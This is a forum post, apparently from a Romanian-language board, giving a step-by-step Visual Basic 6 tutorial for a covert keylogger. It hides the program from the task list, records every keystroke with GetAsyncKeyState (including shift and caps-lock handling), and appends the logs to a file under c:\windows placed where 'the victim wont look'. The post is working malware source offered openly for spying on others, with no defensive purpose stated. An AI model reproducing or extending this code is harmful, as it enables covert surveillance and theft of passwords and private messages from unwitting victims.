|
G-ride
Electrik Buzzz
Inregistrat: acum 16 ani
Postari: 35
|
|
go back to the source and write the following in the "Form_Load" sub
If app.previnstance = true then end
app.taskvisible = false
Which means that if its already running and opened again, it will not start another keylogger (2 keyloggers running would cause errors), and it will not show in the taskmanagers Program list (but still in process list)
Now lets go to the General Section of our source and declare some API functions in order to start writing. General section can be found by using (General) in the top left scrollbar
There are 2 effective methods to keylog with VB6
- Keyhooks
- GetAsyncKeyState
We will be using GetAsyncKeyState, which checks if a key is being pressed when executed
But before we can start using GetAsyncKeyState we must declare it in the general section
GetAsyncKeyState Declaration:
Code:
Private Declare Function GetAsyncKeyState Lib "user32" (byval vkey as long) as integer |
tells what Lib we need for GetAsyncKeyState.
With this code placed we can start using GetAsyncKeyState commands.
To find out what key is pressed we need to use getasynckeystate as so:
Code:
If GetAsyncKeyState(number) <> 0 then
'code to execute if key is pressed
end if |
Now you might be wondering what the "number" means, actually, the number we type here is a keyboard key,
you see, every key has a number (KeyCode), from around 1 to 200. (1 and 2 being mouse buttons)
Full list of KeyCode values
Thats alot of keycode. Now, theres an easy way of checking all of the keys at the same time. But it appears that doing it causes alot of weird symbols and capital letters only.
But i want it done properly so im gonna check One key at a time. You can decide yourself what you want to do.
I will show you the easy method too later on tho.
Now that we know how to check for a keypress we want it to write it down somewheres temporary. There are many ways to do so, i will be using a label. You can use a String aswell.
Set the caption of the label to nothing. Now a full example of the letter "a" would be this:
Code:
if GetAsyncKeyState(65) <> 0 then
label1.caption = label1.caption + "a"
end if |
So that if "a" key is pressed an "a" is added to our label.
Code 65-90 is a-z
To check if a key is pressed more than one time we put the code in a timer. I find that it works best when the interval is set to around 125.
Which means that the code is executed 8 times a second. (125 milliseconds). You must change the interval from 0 to 50-150, else it will not work. you can change the interval in the properties of the timer
If you have less interval, it might double record the keystroke, if you have more, it might miss it.
To start writing to a timer either choose "timer1" in the scrollbar in the top-left corner of the source page, or double-click the timer icon on the form design
Do this again and again with all keys from a-z, and numbers 0-9 (also in numpad)
Now it records letters and numbers, not bad, but we are far from done yet.
if we finished up now our logs would be one big pile of letters, pretty much unreadable.
so what we need to do is add spaces, and a hell lot of em. The user browses around alot, clicking here and there, so if we add spaces on keys like mouse buttons, space, enter, ctrl etc. we would get something readable with alot of spaces.
So find Keycodes for those keys and add a space to the label if pressed. Most important is the mouse clicks.
now, were not done just yet. We want to check if a letter is Capital. we do that by checking if shift or caps-lock has been pressed before every key. And if it has, make it print a capital letter instead.
Now to do this, we want to use booleans (true / false), so goto the general section and write this:
The keycode for capsLock is 20. We want to write capslock like this in the timer.
Code:
if GetAsyncKeyState(20) <> 0 then
if caps = true then
label1.caption = label1.caption + "(/caps)"
caps = false
goto a
end if
label1.caption = label1.caption + "(caps)"
caps = true
end if
a: |
The above code may seem a little confusing, but its simple really. when CapsLock is pressed it writes (caps) into the label. and sets our boolean "caps" to "True".
The next time capsLock is pressed (to disable it) instead of writing (caps) it writes (/caps). and Sets "caps" to "False". That way you will know that the letters between (caps) and (/caps) is all capital. Nice!
Everytime Caps-lock is pressed, it will add (caps) or (/caps) according to the state of the caps boolean.
Its a little different with shift. Shift has the keycode 16 btw.
dim "shift" as boolean in the general section. just like before.
Quote:
If GetasyncKeyState(16) <> 0 then
shift = true
end if
So if Shift is pressed the "shift" boolean becomes true. now in all codes checking for letters add this:
example with "a" key:
Quote:
if GetAsyncKeyState(65) <> 0 then
if shift = true then
label1.caption = label1.caption + "A"
shift = false
goto b
end if
label1.caption = label1.caption + "a"
end if
b:
(remember to use a different letter(s) in the goto commands every time)
So if Shift has been pressed, the next key being pressed will be capital. Nice!
NOTE: You can do this with numbers too to get their symbol instead.
You should now have in your timer, checking for a-z (all with shift check), alot of keys making spaces, capslock check, 0-9.
Now. 2 very important keycodes are missing on the site, so i put them here
Dot: Getasynckeystate(190)
Comma: Getasynckeystate(188)
We are now able to goto the next step. Writing to a Text Document.
Having the logs in a label is not enough. We need to write it to a textfile every now and then.
This process is really simple actually. Open up the source for the second timer (Timer2)
and write following.
Code:
On Error GoTo skip
If Dir("c:\windows\klogs.txt") <> "" Then
Open "c:\windows\klogs.txt" For Append As #1
Write #1, Label1.Caption
Close #1
Else
Open "c:\windows\klogs.txt" For Output As #1
Write #1, DateTime.Time
Write #1,
Write #1, Label1.Caption
Close #1
End If
Label1.Caption = ""
skip: |
The DIR command checks if a file exists. if it exists it executes the code below it, if it does not exist, it executes the code below "Else"
the "Open" creates/opens a textfile, in this case, klogs.txt, you can change this. you can also change the location of it. Just locate it somewhere that the victim wont look.
the "for output as #1" just gives the file a number so it knows what file to write to later on (incase more files are open), Output writes the text file, Input reads the text file, and Append adds more text to the existing text in the textfile. Also as you may notice, if the file does not exist then it writes the time of day into the file. This is usefull for keeping track of when the specific log were from. In this case we only use Output and Append
"write #1, label1.caption" this writes the content of our label into file #1.
"close #1" closes the file.
'Label1.caption = "" ' This deletes the content of our label1 which stores the info. We dont wanna write the same stuff to it again.
Now dont worry. all of this writing and creating happens invisibly.
I suggest doing this every 30-60 seconds. (30 seconds = interval of 30000 on the timer)
As said above, we write the Time of day into the log file to help os keep track of it. When the file is first created it will write the time into it. But thats not quite good enough. for us. We want it to write the time of date into the file everytime the keylogger is being opened again (usually after shutdown)
So write this to the "Form_Load":
Code:
If Dir("c:\windows\klogs.txt") <> "" Then
open "c:\windows\klogs.txt" for append as #1
write #1,
write #1, DateTime.time
write #1,
close #1 |
So now it stores Time marks everytime its opened.
NEAT! now every 30-60 seconds all logs is stored in a text document.
At this point you should try debugging the file. (little blue triangle button)
16.1KB
_______________________________________
|
|
